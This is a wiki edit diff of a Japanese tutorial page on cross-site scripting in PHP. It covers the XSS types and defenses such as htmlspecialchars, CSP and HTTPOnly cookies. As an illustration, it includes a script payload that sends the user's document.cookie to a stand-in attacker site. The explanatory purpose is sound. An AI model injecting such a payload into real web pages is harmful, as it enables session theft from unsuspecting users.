13,176
回編集
(ページの作成:「== 概要 == <br><br> == htmlspecialchars関数の使用 == HTMLコンテンツを出力する場合は、htmlspecialchars関数を使用する。<br> <br> 例えば、データベースに<u>"<script>alert('攻撃')</script>"</u>のような悪意のあるスクリプトが格納されている場合、htmlspecialchars関数を使用しないと、そのスクリプトがWebブラウザで実行される可能性がある。<br> <br> htmlspecialchars関数を使…」) |
(→概要) |
||
| 1行目: | 1行目: | ||
== 概要 == | == 概要 == | ||
XSS (クロスサイトスクリプティング) 攻撃は、Webアプリケーションの脆弱性を利用して、悪意のあるスクリプトをユーザのWebブラウザで実行させる攻撃手法である。<br> | |||
<br> | |||
主な攻撃タイプには、反射型XSS、格納型XSS、DOMベースXSSがある。<br> | |||
* 反射型XSS | |||
*: ユーザの入力データがそのままレスポンスとして返される場合に発生する。 | |||
* 格納型XSS | |||
*: 悪意のあるスクリプトがデータベースに保存されて、他のユーザがページを閲覧した時に実行される。 | |||
* DOMベースXSS | |||
*: クライアントサイドのJavaScriptによってDOMが動的に変更される時に発生する。 | |||
<br> | |||
PHPでの対策として、<code>htmlspecialchars</code>関数を使用してHTML特殊文字をエスケープする。<br> | |||
<syntaxhighlight lang="php"> | |||
$safe_output = htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8'); | |||
</syntaxhighlight> | |||
<br> | |||
その他の重要な対策として、Content Security Policy (CSP) の実装、HTTPOnly属性の設定、入力値の適切なバリデーション、出力時のエンコーディング、最新のPHPフレームワークの使用等が挙げられる。<br> | |||
<br> | |||
実際の攻撃例として、以下に示すようなスクリプトが挿入される可能性がある。<br> | |||
<br> | |||
これにより、ユーザのクッキー情報が攻撃者のサーバーに送信される可能性がある。<br> | |||
このような攻撃を防ぐために、適切なエスケープ処理と入力検証が不可欠である。<br> | |||
<syntaxhighlight lang="javascript"> | |||
<script> | |||
document.location='http://악성サイト.com/steal.php?cookie='+document.cookie; | |||
</script> | |||
</syntaxhighlight> | |||
<br><br> | <br><br> | ||